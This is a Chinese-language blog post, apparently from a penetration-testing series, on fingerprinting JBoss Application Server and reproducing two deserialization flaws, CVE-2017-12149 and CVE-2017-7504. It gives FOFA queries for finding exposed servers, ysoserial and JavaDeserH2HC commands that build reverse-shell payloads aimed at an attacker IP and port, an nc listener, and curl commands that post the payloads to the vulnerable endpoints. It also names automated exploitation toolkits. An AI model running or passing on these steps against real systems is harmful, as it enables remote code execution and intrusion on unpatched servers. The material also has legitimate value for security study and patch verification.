当前位置: 首页 > news >正文

JBoss中间件特征及漏洞复现

Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。

Web特征

其默认页在8080端口(可变),welcome界面:

image-20251123153754473

该产品存在标签页icon图标:image-20251123153854715

在欢迎界面可以看到有管理接口的相关入口:

image-20251123154045315

进入后经过身份验证后即可进入管理界面。

fofa语法:title="Welcome to JBoss AS"title="Welcome to JBoss AS" && port="8080"

漏洞复现

CVE-2017-12149(反序列化)

此漏洞由于HttpInvoker组件中的ReadOnlyAccessFilter过滤器在未进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。

主要问题出现在/invoker/readonly请求中,服务器将用户提交的POST内容进行了Java反序列化:

image-20251123154621143

影响范围:JBoss AS 5.x、JBoss AS 6.x

复现示例

**这里使用常规Java反序列化漏洞测试方法来复现该漏洞。*

此漏洞利用有两种方法:

法一:手工构造命令

1、编写并处理反弹shell的命令

反弹shell需要使用bash,但由于Runtime.getRuntime().exec()中不能使用管道符等bash需要的方法,所以需要用进行一次编码。

工具:runtime-exec-payloads

image-20251123155640888

2、序列化数据生成恶意文件

使用ysoserial来复现生成序列化数据,由于目标使用的Java版本较新,所以选择使用的gadget是CommonsCollections5(CC5):

PS:实战时由于适用范围广所以CC5\CC6均可尝试。

java -jar ysoserial.jar CommonsCollections5 "<上一步编码后的指令>" > poc.ser
image-20251123161330576

3、发送POC

生成好的POC即为poc.ser,将这个文件作为POST Body发送至/invoker/readonly即可:

PS:数据包中Content-Type要改成:application/data,并在下方空白处选择“从文件粘贴”。

可以通过bp也可以通过curl命令,这里使用curl成功,bp由于未知原因失败了:

curl -X POST http://target-ip:8080/invoker/readonly -H "Content-Type: application/x-java-serialized-object" --data-binary "@poc.ser"
image-20251123163153952

法二:通过自动化利用工具

工具1:集成天狐渗透工具箱-社区版V2.0纪念版/JBoss漏洞检测利用工具

image-20251123164655159

工具2:JBoss-CVE-2017-12149检测利用工具

image-20251123164809527image-20251123164907013

CVE-2017-7504(JBossMQ JMS 反序列化)

在JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。

影响范围:JBoss 4.x

复现示例

此漏洞依然是两种方法进行复现:

法一:手工命令

*注意要使用java8

通过借助JavaDeserH2HC生成的POC来复现。生成Payload:

javac8 -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
image-20251123171209364

设置接收shell的ip和端口:

java8 -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 攻击机IP:监听端口
image-20251123171519992

开启监听:

nc -lvvp 监听端口

因为此漏洞出现在/jbossmq-httpil/HTTPServerILServlet请求中,所以将payload发送到该接口(在poc目录下执行):

curl http://target-IP:8080/jbossmq-httpil/HTTPServerILServlet  --data-binary @ReverseShellCommonsCollectionsHashMap.ser
image-20251123172755907

法二:自动化工具

工具:集成天狐渗透工具箱-社区版V2.0纪念版/JBoss漏洞检测利用工具

image-20251123172958321image-20251123173017526

http://www.gsyq.cn/news/68503.html

相关文章:

  • 大华摄像头系统特征及漏洞探测利用
  • 大华DSS系统特征及漏洞探测利用
  • 畅捷通系统特征及漏洞探测利用
  • 瑞友天翼系统特征及漏洞探测利用
  • 2025年河北公职考试培训优质品牌推荐:仕登科全阶段备考服务 高校合作保障,助力考生稳上岸!
  • 金和OA系统特征及漏洞探测利用
  • 随机动量梯度法的末点收敛性分析
  • 通达OA系统特征及漏洞探测利用
  • 蓝凌OA系统特征及漏洞探测利用
  • 2025年优质供应链云平台TOP10,实现全链路数字化!财务云/供应链云/易代账/用友 T3/协同云/制造云/好业财供应链云产品选哪家
  • git项目管理idea
  • Manim v0.19.1 发布啦!三大新特性让动画制作更丝滑
  • React 14 - 教程
  • 主席树板子
  • 气密性检漏仪精品定制TOP5权威推荐:甄选供应企业与大型厂家
  • 2025年工业冷风机降温效果揭秘:如何选择适合的降温设备,五金车间通风降温/铁皮房车间降温/汽车配件车间通风降温工业冷风机供应商推荐排行榜
  • pinia应用
  • 2025年口碑好的家用电吹风开关/电吹风开关厂家最新权威实力榜
  • 2025年廊坊地区服务不错的短视频代运营企业推荐,短视频代运
  • 2025年12月全国太阳能路灯厂家五大推荐:场景导向排行榜与全链路照明解决方案
  • 2025年市面上服务好的花灯制作价格推荐,大型户外花灯/商场美陈花灯/灯会花灯/智能花灯/生肖花灯/花灯灯展/马年花灯批发口碑推荐
  • 2025年耐用的吨袋真空包装机行业内知名厂家排行榜
  • 2025比较有名的留学机构
  • 2025年评价高的馄饨皮切皮机/智能切皮机行业内口碑厂家排行榜
  • 2025年口碑好的面条机厂家最新实力排行
  • 2025年口碑好的穿墙止水螺杆厂家推荐及选择参考
  • 2025年口碑好的挤出机用户口碑最好的厂家榜
  • 2025年培育钻店铺推荐供货厂家权威推荐榜单:淘宝培育钻店铺推荐‌/培育钻推荐‌/培育钻推荐品牌‌源头厂家精选
  • 2025年舞台升降幕批发厂家权威榜单:电影院银幕/影院银幕/舞美演义幕提供商精选
  • 2025年钢结构防火涂料订制厂家权威推荐榜单:饰面防火涂料‌/室内防火涂料‌/电缆防火涂料‌源头厂家精选